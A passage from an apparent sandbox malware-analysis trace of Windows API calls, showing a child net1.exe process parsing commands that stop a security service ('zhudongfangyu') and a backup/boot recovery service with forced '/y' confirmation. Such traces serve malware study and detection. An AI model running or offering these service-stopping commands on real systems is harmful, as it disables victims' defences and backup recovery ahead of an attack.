dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.307] GetFileType (hFile=0x0) returned 0x0 [0105.307] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7a6178 [0105.307] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7a6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0105.307] WriteFile (in: hFile=0x0, lpBuffer=0x7a6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31fd60, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fd60, lpOverlapped=0x0) returned 0 [0105.307] LocalFree (hMem=0x7a6178) returned 0x0 [0105.307] GetFileType (hFile=0x0) returned 0x0 [0105.308] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7a6178 [0105.308] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7a6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nz", lpUsedDefaultChar=0x0) returned 2 [0105.308] WriteFile (in: hFile=0x0, lpBuffer=0x7a6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31fd60, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fd60, lpOverlapped=0x0) returned 0 [0105.308] LocalFree (hMem=0x7a6178) returned 0x0 [0105.308] NetApiBufferFree (Buffer=0x7a1ae8) returned 0x0 [0105.308] NetApiBufferFree (Buffer=0x7a1b00) returned 0x0 [0105.308] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop zhudongfangyu /y" [0105.308] exit (_Code=2) Process: id = "106" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1ead9000" os_pid = "0xaf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0xa44" cmd_line = "C:\\Windows\\system32\\net1 stop BMR Boot Service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 475 os_tid = 0xaec [0104.394] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f89c | out: lpSystemTimeAsFileTime=0x16f89c*(dwLowDateTime=0x1389bf90, dwHighDateTime=0x1d6f0d1)) [0104.394] GetCurrentProcessId () returned 0xaf0 [0104.394] GetCurrentThreadId () returned 0xaec [0104.394] GetTickCount () returned 0x114e1c8 [0104.394] QueryPerformanceCounter (in: lpPerformanceCount=0x16f894 | out: lpPerformanceCount=0x16f894*=22349455011) returned 1 [0104.394] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0104.394] __set_app_type (_Type=0x1) [0104.394] __p__fmode () returned 0x770331f4 [0104.394] __p__commode () returned 0x770331fc [0104.394] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0104.394] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0104.394] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.394] GetConsoleOutputCP () returned 0x1b5 [0104.396] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0104.396] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.399] sprintf_s (in: _DstBuf=0x16f854, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.399] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.082] GetStdHandle (nStdHandle=0xfffffff5) returned 0x30c [0105.082] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.082] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BMR Boot Service /y" [0105.083] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f620, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0105.083] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x7c) returned 0x473af0 [0105.083] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.083] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f824 | out: Buffer=0x16f824*=0x471af8) returned 0x0 [0105.083] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f824 | out: Buffer=0x16f824*=0x471b10) returned 0x0 [0105.083] _fileno (_File=0x77032900) returned -2 [0105.083] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0105.083] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.083] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.083] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.083] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.083] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.083] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.083] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.084] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.084] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.084] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.084] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.084] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.084] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.084] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.084] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.084] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.084] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.084] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.084] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.084] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.084] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.084] _wcsicmp (_String1="accounts", _String2="BMR") returned -1 [0105.084] _wcsicmp (_String1="computer", _String2="BMR") returned 1 [0105.084] _wcsicmp (_String1="config", _String2="BMR") returned 1 [0105.084] _wcsicmp (_String1="continue", _String2="BMR") returned 1 [0105.084] _wcsicmp (_String1="cont", _String2="BMR") returned 1 [0105.084] _wcsicmp (_String1="file", _String2="BMR") returned 4 [0105.084] _wcsicmp (_String1="files", _String2="BMR") returned 4 [0105.084] _wcsicmp (_String1="group", _String2="BMR") returned 5 [0105.084] _wcsicmp (_String1="groups", _String2="BMR") returned 5 [0105.084] _wcsicmp (_String1="help", _String2="BMR") returned 6 [0105.084] _wcsicmp (_String1="helpmsg", _String2="BMR") returned 6 [0105.084] _wcsicmp (_String1="localgroup", _String2="BMR") returned 10 [0105.084] _wcsicmp (_String1="pause", _String2="BMR") returned 14 [0105.085] _wcsicmp (_String1="session", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="sessions", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="sess", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="share", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="start", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="stats", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="statistics", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="stop", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="time", _String2="BMR") returned 18 [0105.085] _wcsicmp (_String1="user", _String2="BMR") returned 19 [0105.085] _wcsicmp (_String1="users", _String2="BMR") returned 19 [0105.085] _wcsicmp (_String1="msg", _String2="BMR") returned 11 [0105.085] _wcsicmp (_String1="messenger", _String2="BMR") returned 11 [0105.085] _wcsicmp (_String1="receiver", _String2="BMR") returned 16 [0105.085] _wcsicmp (_String1="rcv", _String2="BMR") returned 16 [0105.085] _wcsicmp (_String1="netpopup", _String2="BMR") returned 12 [0105.085] _wcsicmp (_String1="redirector", _String2="BMR") returned 16 [0105.085] _wcsicmp (_String1="redir", _String2="BMR") returned 16 [0105.085] _wcsicmp (_String1="rdr", _String2="BMR") returned 16 [0105.085] _wcsicmp (_String1="workstation", _String2="BMR") returned 21 [0105.085] _wcsicmp (_String1="work", _String2="BMR") returned 21 [0105.085] _wcsicmp (_String1="wksta", _String2="BMR") returned 21 [0105.085] _wcsicmp (_String1="prdr", _String2="BMR") returned 14 [0105.085] _wcsicmp (_String1="devrdr", _String2="BMR") returned 2 [0105.085] _wcsicmp (_String1="lanmanworkstation", _String2="BMR") returned 10 [0105.085] _wcsicmp (_String1="server", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="svr", _String2="BMR") returned 17 [0105.085] _wcsicmp (_String1="srv", _String2="BMR") returned 17 [0105.086] _wcsicmp (_String1="lanmanserver", _String2="BMR") returned 10 [0105.086] _wcsicmp (_String1="alerter", _String2="BMR") returned -1 [0105.086] _wcsicmp (_String1="netlogon", _String2="BMR") returned 12 [0105.086] _wcsicmp (_String1="accounts", _String2="Boot") returned -1 [0105.086] _wcsicmp (_String1="computer", _String2="Boot") returned 1 [0105.086] _wcsicmp (_String1="config", _String2="Boot") returned 1 [0105.086] _wcsicmp (_String1="continue", _String2="Boot") returned 1 [0105.086] _wcsicmp (_String1="cont", _String2="Boot") returned 1 [0105.086] _wcsicmp (_String1="file", _String2="Boot") returned 4 [0105.086] _wcsicmp (_String1="files", _String2="Boot") returned 4 [0105.086] _wcsicmp (_String1="group", _String2="Boot") returned 5 [0105.086] _wcsicmp (_String1="groups", _String2="Boot") returned 5 [0105.086] _wcsicmp (_String1="help", _String2="Boot") returned 6 [0105.086] _wcsicmp (_String1="helpmsg", _String2="Boot") returned 6 [0105.086] _wcsicmp (_String1="localgroup", _String2="Boot") returned 10 [0105.086] _wcsicmp (_String1="pause", _String2="Boot") returned 14 [0105.086] _wcsicmp (_String1="session", _String2="Boot") returned 17 [0105.086] _wcsicmp (_String1="sessions", _String2="Boot") returned 17 [0105.086] _wcsicmp (_String1="sess", _String2="Boot") returned 17 [0105.086] _wcsicmp (_String1="share", _String2="Boot") returned 17 [0105.086] _wcsicmp (_String1="start", _String2="Boot") returned 17 [0105.087] _wcsicmp (_String1="stats", _String2="Boot") returned 17 [0105.087] _wcsicmp (_String1="statistics", _String2="Boot") returned 17 [0105.087] _wcsicmp (_String1="stop", _String2="Boot") returned 17 [0105.087] _wcsicmp (_String1="time", _String2="Boot") returned 18 [0105.087] _wcsicmp (_String1="user", _String2="Boot") returned 19 [0105.087] _wcsicmp (_String1="users", _String2="Boot") returned 19 [0105.087] _wcsicmp (_String1="msg", _String2="Boot") returned 11 [0105.087] _wcsicmp (_String1="messenger", _String2="Boot") returned 11 [0105.087] _wcsicmp (_String1="receiver", _String2="Boot") returned 16 [0105.087] _wcsicmp (_String1="rcv", _String2="Boot") returned 16 [0105.087] _wcsicmp (_String1="netpopup", _String2="Boot") returned 12 [0105.087] _wcsicmp (_String1="redirector", _String2="Boot") returned 16 [0105.087] _wcsicmp (_String1="redir", _String2="Boot") returned 16 [0105.087] _wcsicmp (_String1="rdr", _String2="Boot") returned 16 [0105.087] _wcsicmp (_String1="workstation", _String2="Boot") returned 21 [0105.087] _wcsicmp (_String1="work", _String2="Boot") returned 21 [0105.087] _wcsicmp (_String1="wksta", _String2="Boot") returned 21 [0105.087] _wcsicmp (_String1="prdr", _String2="Boot") returned 14 [0105.087] _wcsicmp (_String1="devrdr", _String2="Boot") returned 2 [0105.087] _wcsicmp (_String1="lanmanworkstation", _String2="Boot") returned 10 [0105.087] _wcsicmp (_String1="server", _String2="Boot") returned 17 [0105.087] _wcsicmp (_String1="svr", _String2="Boot") returned 17 [0105.087] _wcsicmp (_String1="srv", _String2="Boot") returned 17 [0105.087] _wcsicmp (_String1="lanmanserver", _String2="Boot") returned 10 [0105.087] _wcsicmp (_String1="alerter", _String2="Boot") returned -1 [0105.088] _wcsicmp (_String1="netlogon", _String2="Boot") returned 12 [0105.088] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.108] wcscpy_s (in: _Destination=0x16f324, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0105.108] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74880000 [0105.109] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x16f320, nSize=0x0, Arguments=0x16f31c | out: lpBuffer="哰Gneth.dll") returned 0xff [0105.110] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0105.110] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0105.110] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0105.110] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0105.110] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0105.110] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0105.110] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0105.111] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0105.111] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0105.111] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0105.111] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.111] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0105.111] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0105.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0105.111] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.111] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0105.111] _wcsicmp (_String1="CONT", _String2="BMR") returned 1 [0105.111] _wcsicmp (_String1="CONT", _String2="Boot") returned 1 [0105.111] _wcsicmp (_String1="CONT", _String2="Service") returned -16 [0105.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.111] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0105.111] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0105.111] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.111] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0105.111] _wcsicmp (_String1="FILES", _String2="BMR") returned 4 [0105.111] _wcsicmp (_String1="FILES", _String2="Boot") returned 4 [0105.111] _wcsicmp (_String1="FILES", _String2="Service") returned -13 [0105.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.111] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0105.112] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0105.112] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.112] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0105.112] _wcsicmp (_String1="GROUPS", _String2="BMR") returned 5 [0105.112] _wcsicmp (_String1="GROUPS", _String2="Boot") returned 5 [0105.112] _wcsicmp (_String1="GROUPS", _String2="Service") returned -12 [0105.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.112] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0105.112] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0105.112] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.112] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0105.112] _wcsicmp (_String1="REPL", _String2="BMR") returned 16 [0105.112] _wcsicmp (_String1="REPL", _String2="Boot") returned 16 [0105.112] _wcsicmp (_String1="REPL", _String2="Service") returned -1 [0105.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0105.112] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.112] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0105.112] _wcsicmp (_String1="REPLICATOR", _String2="BMR") returned 16 [0105.112] _wcsicmp (_String1="REPLICATOR", _String2="Boot") returned 16 [0105.112] _wcsicmp (_String1="REPLICATOR", _String2="Service") returned -1 [0105.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.113] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0105.113] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.113] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0105.113] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.113] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0105.113] _wcsicmp (_String1="SESSIONS", _String2="BMR") returned 17 [0105.113] _wcsicmp (_String1="SESSIONS", _String2="Boot") returned 17 [0105.113] _wcsicmp (_String1="SESSIONS", _String2="Service") returned 1 [0105.113] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0105.113] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.113] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0105.113] _wcsicmp (_String1="SESS", _String2="BMR") returned 17 [0105.113] _wcsicmp (_String1="SESS", _String2="Boot") returned 17 [0105.113] _wcsicmp (_String1="SESS", _String2="Service") returned 1 [0105.113] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.113] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0105.113] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.113] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0105.113] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.113] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0105.113] _wcsicmp (_String1="STATS", _String2="BMR") returned 17 [0105.113] _wcsicmp (_String1="STATS", _String2="Boot") returned 17 [0105.113] _wcsicmp (_String1="STATS", _String2="Service") returned 15 [0105.113] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.113] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0105.114] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.114] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0105.114] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.114] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0105.114] _wcsicmp (_String1="USERS", _String2="BMR") returned 19 [0105.114] _wcsicmp (_String1="USERS", _String2="Boot") returned 19 [0105.114] _wcsicmp (_String1="USERS", _String2="Service") returned 2 [0105.114] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.114] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0105.114] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.114] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0105.114] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.114] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0105.114] _wcsicmp (_String1="REDIRECTOR", _String2="BMR") returned 16 [0105.114] _wcsicmp (_String1="REDIRECTOR", _String2="Boot") returned 16 [0105.114] _wcsicmp (_String1="REDIRECTOR", _String2="Service") returned -1 [0105.114] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0105.114] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.114] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0105.114] _wcsicmp (_String1="REDIR", _String2="BMR") returned 16 [0105.114] _wcsicmp (_String1="REDIR", _String2="Boot") returned 16 [0105.114] _wcsicmp (_String1="REDIR", _String2="Service") returned -1 [0105.114] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0105.114] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.115] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0105.115] _wcsicmp (_String1="RDR", _String2="BMR") returned 16 [0105.115] _wcsicmp (_String1="RDR", _String2="Boot") returned 16 [0105.115] _wcsicmp (_String1="RDR", _String2="Service") returned -1 [0105.115] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0105.115] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.115] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0105.115] _wcsicmp (_String1="WORK", _String2="BMR") returned 21 [0105.115] _wcsicmp (_String1="WORK", _String2="Boot") returned 21 [0105.115] _wcsicmp (_String1="WORK", _String2="Service") returned 4 [0105.115] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0105.115] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.115] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0105.115] _wcsicmp (_String1="WKSTA", _String2="BMR") returned 21 [0105.115] _wcsicmp (_String1="WKSTA", _String2="Boot") returned 21 [0105.115] _wcsicmp (_String1="WKSTA", _String2="Service") returned 4 [0105.115] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0105.115] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.115] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0105.115] _wcsicmp (_String1="PRDR", _String2="BMR") returned 14 [0105.115] _wcsicmp (_String1="PRDR", _String2="Boot") returned 14 [0105.115] _wcsicmp (_String1="PRDR", _String2="Service") returned -3 [0105.115] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0105.115] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0105.115] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0105.115] _wcsicmp (_String1="DEVRDR", _String2="BMR") returned 2 [0105.116] _wcsicmp (_String1="DEVRDR", _String2="Boot") returned 2 [0105.116] _wcsicmp (_String1="DEVRDR", _String2="Service") returned -15 [0105.116] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.116] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0105.116] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.116] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0105.116] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0105.116] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0105.116] _wcsicmp (_String1="SVR", _String2="BMR") returned 17 [0105.116] _wcsicmp (_String1="SVR", _String2="Boot") returned 17 [0105.116] _wcsicmp (_String1="SVR", _String2="Service") returned 17 [0105.116] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0105.116] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.116] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0105.116] _wcsicmp (_String1="SRV", _String2="BMR") returned 17 [0105.116] _wcsicmp (_String1="SRV", _String2="Boot") returned 17 [0105.116] _wcsicmp (_String1="SRV", _String2="Service") returned 13 [0105.116] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x16f320, nSize=0x0, Arguments=0x16f31c | out: lpBuffer="㶸Gꔺ盹") returned 0x1c [0105.116] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0105.116] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0105.116] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0105.116] wcstok (in: _String=0x0, 